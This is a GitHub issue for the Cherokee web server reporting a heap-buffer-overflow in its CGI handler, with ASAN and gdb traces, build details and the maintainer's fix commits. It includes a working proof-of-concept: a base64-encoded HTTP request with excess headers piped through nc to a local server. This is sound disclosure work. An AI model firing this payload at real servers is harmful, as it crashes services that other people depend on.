Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

heap-buffer-overflow in handler cgi #1225

Closed
mmmds opened this issue Jul 25, 2019 · 1 comment
Closed

heap-buffer-overflow in handler cgi #1225

mmmds opened this issue Jul 25, 2019 · 1 comment
Assignees

Comments

@mmmds
Copy link

mmmds commented Jul 25, 2019

PoC

echo -n 'R0VUIC90ZXN0MTAvdGVzdC5odG1sIEhUVFAvMS4xCkFjY2VwdDogMTI3LjAuMC4xCkFjY2VwdC1DaGFyc2V0OiAxMjcuMC4wLjEKQWNjZXB0LUVuY29kaW5nOiAxMjcuMC4wLjEKQWNjZXB0LUxhbmd1YWdlOiAxMjcuMC4wLjEKQXV0aG9yaXphdGlvbjogMTI3LjAuMC4xCkNhY2hlLUNvbnRyb2w6IDEyNy4wLjAuMQpDaGFyZ2UtVG86IDEyNy4wLjAuMQpDb25uZWN0aW9uOiAxMjcuMC4wLjEKQ29udGVudC1UeXBlOiAxMjcuMC4wLjEKQ29va2llOiAxMjcuMC4wLjEKRE5UOiAxMjcuMC4wLjEKRXhwZWN0OiAxMjcuMC4wLjEKRm9yd2FyZGVkOiAxMjcuMC4wLjEKRnJvbTogMTI3LjAuMC4xCkZyb250LUVuZC1IdHRwZDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpJZi1NYXRjaDogMTI3LjAuMC4xCklmLU1vZGlmaWVkLVNpbmNlOiAxMjcuMC4wLjEKSWYtTm9uZS1NYXRjaDogMTI3LjAuMC4xCklmLVJhbmdlOiAxMjcuMC4wLjEKSWYtVW5tb2RpZmllZC1TaW5jZTogMTI3LjAuMC4xCktlZXAtQWxpdmU6IDEyNy4wLjAuMQpNYXgtRm9yd2FyZHM6IDEyNy4wLjAuMQpOZWdvdGlhdGU6IDEyNy4wLjAuMQpQcmFnbWE6IDEyNy4wLjAuMQpQcm94eS1BdXRob3JpemF0aW9uOiAxMjcuMC4wLjEKUHJveHktQ29ubmVjdGlvbjogMTI3LjAuMC4xCk9yaWdpbjogMTI3LjAuMC4xClJhbmdlOiAxMjcuMC4wLjEKVEU6IDEyNy4wLjAuMQpUcmFuc2Zlci1FbmNvZGluZzogMTI3LjAuMC4xClRyYW5zZmVyLUVuY29kaW5nOiAxMjcuMC4wLjEKVXBncmFkZTogMTI3LjAuMC4xClVwZ3JhZGU6IDEyNy4wLjAuMQpVc2VyLUFnZW50OiAxMjcuMC4wLjEKVXNlci1BZ2VudDogMTI3LjAuMC4xClVzZXItQWdlbnQ6IDEyNy4wLjAuMQpWaWE6IDEyNy4wLjAuMQpQcm94eS1BdXRob3JpemF0aW9uOiAxMjcuMC4wLjEKUHJveHktQ29ubmVjdGlvbjogMTI3LjAuMC4xCk9yaWdpbjogMTI3LjAuMC4xClJhbmdlOiAxMjcuMC4wLjEKUmVmZXJlcjogMTI3LjAuMC4xClJlZmVyZXI6IDEyNy4wLjAuMQpSZXF1ZXN0LVJhbmdlOiAxMjcuMC4wLjEKVEU6IDEyNy4wLjAuMQpUcmFuc2Zlci1FbmNvZGluZzogMTI3LjAuMC4xClRyYW5zZmVyLUVuY29kaW5nOiAxMjcuMC4wLjEKVXBncmFkZTogMTI3LjAuMC4xClVwZ3JhZGU6IDEyNy4wLjAuMQpVc2VyLUFnZW50OiAxMjcuMC4wLjEKVXNlci1BZ2VudDogMTI3LjAuMC4xClVzZXItQWdlbnQ6IDEyNy4wLjAuMQpWaWE6IDEyNy4wLjAuMQpYLUFUVC1EZXZpY2VJZDogMTI3LjAuMC4xClgtRm9yd2FyZGVkLUZvcjogMTI3LjAuMC4xClgtRm9yd2FyZGVkLUhvc3Q6IDEyNy4wLjAuMQpYLUZvcndhcmRlZC1Qcm90bzogMTI3LjAuMC4xClgtRm9yd2FyZGVkLVNlcnZlcjogMTI3LjAuMC4xClgtUmVxdWVzdGVkLVdpdGg6IDEyNy4wLjAuMQpYLWxvcmktdGltZS0xOiAxMjcuMC4wLjEKWC1Eby1Ob3QtVHJhY2s6IDEyNy4wLjAuMQpYLUNvbnRlbnQtU2VjdXJpdHktUG9saWN5OiAxMjcuMC4wLjEKWC1Db250ZW50LVR5cGUtT3B0aW9uczogMTI3LjAuMC4xClgtRnJhbWUtT3B0aW9uczogMTI3LjAuMC4xClgtWFNTLVByb3RlY3Rpb246IDEyNy4wLjAuMQpYLVdhcC1Qcm9maWxlOiAxMjcuMC4wLjEKCgo=' | base64 -d | nc 127.0.0.1 80

ASAN

==26982==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6180000117c0 at pc 0x559e00d26059 bp 0x7f01f18e9250 sp 0x7f01f18e9240
READ of size 8 at 0x6180000117c0 thread T4
    #0 0x559e00d26058 in cherokee_services_client_spawn /home/mmm/fuzz/webserver/cherokee/services-client.c:201
    #1 0x559e00d5dd3c in fork_and_execute_cgi_via_spawner /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:802
    #2 0x559e00d5a5a8 in cherokee_handler_cgi_init /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:382
    #3 0x559e00dd244c in cherokee_handler_init /home/mmm/fuzz/webserver/cherokee/handler.c:93
    #4 0x559e00dcf233 in cherokee_connection_open_request /home/mmm/fuzz/webserver/cherokee/connection.c:2678
    #5 0x559e00d0b889 in process_active_connections /home/mmm/fuzz/webserver/cherokee/thread.c:1165
    #6 0x559e00d11549 in cherokee_thread_step_MULTI_THREAD /home/mmm/fuzz/webserver/cherokee/thread.c:2086
    #7 0x559e00d05300 in thread_routine /home/mmm/fuzz/webserver/cherokee/thread.c:99
    #8 0x7f01f69f46da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da)
    #9 0x7f01f651988e in __clone (/lib/x86_64-linux-gnu/libc.so.6+0x12188e)

0x6180000117c0 is located 0 bytes to the right of 832-byte region [0x618000011480,0x6180000117c0)
allocated by thread T4 here:
    #0 0x7f01f6f22b50 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb50)
    #1 0x559e00d5908e in cherokee_handler_cgi_new /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:124
    #2 0x559e00dcd8b0 in cherokee_connection_create_handler /home/mmm/fuzz/webserver/cherokee/connection.c:2446
    #3 0x559e00d0b1f1 in process_active_connections /home/mmm/fuzz/webserver/cherokee/thread.c:1104
    #4 0x559e00d11549 in cherokee_thread_step_MULTI_THREAD /home/mmm/fuzz/webserver/cherokee/thread.c:2086
    #5 0x559e00d05300 in thread_routine /home/mmm/fuzz/webserver/cherokee/thread.c:99
    #6 0x7f01f69f46da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da)

Thread T4 created by T0 here:   
    #0 0x7f01f6e7bd2f in __interceptor_pthread_create (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x37d2f)
    #1 0x559e00d06219 in cherokee_thread_new /home/mmm/fuzz/webserver/cherokee/thread.c:247
    #2 0x559e00cee73f in initialize_server_threads /home/mmm/fuzz/webserver/cherokee/server.c:671
    #3 0x559e00cf0a05 in cherokee_server_initialize /home/mmm/fuzz/webserver/cherokee/server.c:1053
    #4 0x559e00c9476f in common_server_initialization /home/mmm/fuzz/webserver/cherokee/main_worker.c:255
    #5 0x559e00c951f7 in main /home/mmm/fuzz/webserver/cherokee/main_worker.c:393
    #6 0x7f01f6419b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/mmm/fuzz/webserver/cherokee/services-client.c:201 in cherokee_services_client_spawn
Shadow bytes around the buggy address:
  0x0c307fffa2a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c307fffa2b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c307fffa2c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c307fffa2d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c307fffa2e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c307fffa2f0: 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa
  0x0c307fffa300: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c307fffa310: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c307fffa320: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c307fffa330: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c307fffa340: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==26982==ABORTING

Setup:

  • Ubuntu 18.04 64 bit
  • source code from github, commit 9a75e65
  • build command:
ac_cv_func_realloc_0_nonnull=yes ac_cv_func_malloc_0_nonnull=yes LDFLAGS="-lasan" LDADD="-lasan" CFLAGS="-fsanitize=address -ggdb -O0 -fprofile-arcs -ftest-coverage" ./configure --prefix=`pwd`/bin --enable-trace --enable-static-module=all --enable-static --enable-shared=no
make
  • files in webroot mkdir /var/www/test{1..20}; for i in seq 1 20; do echo test > test$i/test.html; done
  • configuration file cherokee.txt

found by: Mateusz Kocielski, Michał Dardas from LogicalTrust

@skinkie skinkie self-assigned this Jul 25, 2019
@skinkie skinkie added the t:bug label Jul 25, 2019
@skinkie
Copy link
Member

skinkie commented Nov 9, 2019

In my own test I end up with, which obviously is also something that should be fixed.

Thread 1 "cherokee-worker" received signal SIGSEGV, Segmentation fault.
0x00007ffff71d0452 in ?? () from /usr/lib/gcc/x86_64-pc-linux-gnu/9.2.0/libasan.so.5
(gdb) bt
#0  0x00007ffff71d0452 in ?? () from /usr/lib/gcc/x86_64-pc-linux-gnu/9.2.0/libasan.so.5
#1  0x00007ffff72b3f45 in free () from /usr/lib/gcc/x86_64-pc-linux-gnu/9.2.0/libasan.so.5
#2  0x0000555555711624 in cherokee_handler_cgi_free (cgi=0x618000005480) at handler_cgi.c:240
#3  0x000055555579a8e9 in cherokee_handler_free (hdl=0x618000005480) at handler.c:72
#4  0x0000555555788d03 in cherokee_connection_setup_error_handler (conn=0x61d000006e80) at connection.c:442
#5  0x00005555556c6505 in process_active_connections (thd=0x61300000d080) at thread.c:1276
#6  0x00005555556ca112 in cherokee_thread_step_SINGLE_THREAD (thd=0x61300000d080) at thread.c:1891
#7  0x00005555556abbf6 in cherokee_server_step (srv=0x617000000080) at server.c:1161
#8  0x0000555555651591 in main (argc=1, argv=0x7fffffffd978) at main_worker.c:407

skinkie added a commit that referenced this issue Nov 10, 2019
In #1224 it was already pointed out that what issues arise when the number of headers exceed ENV_VAR_NUM.
It seems also be the root cause of issue #1225. In addition I guarantee that the envp list always ends with NULL, a required terminal.
skinkie added a commit that referenced this issue Nov 16, 2019
* Address a memory leak

* Improve the CGI handler in case of header excess

In #1224 it was already pointed out that what issues arise when the number of headers exceed ENV_VAR_NUM. It seems also be the root cause of issue #1225. In addition I guarantee that the envp list always ends with NULL, a required terminal.

* Introduce a QA-test that would crash Cherokee if more than ENV_VAR_NUM are send in by a client towards Handler CGI.

Fix #1224 and #1225
@skinkie skinkie closed this as completed Nov 16, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

2 participants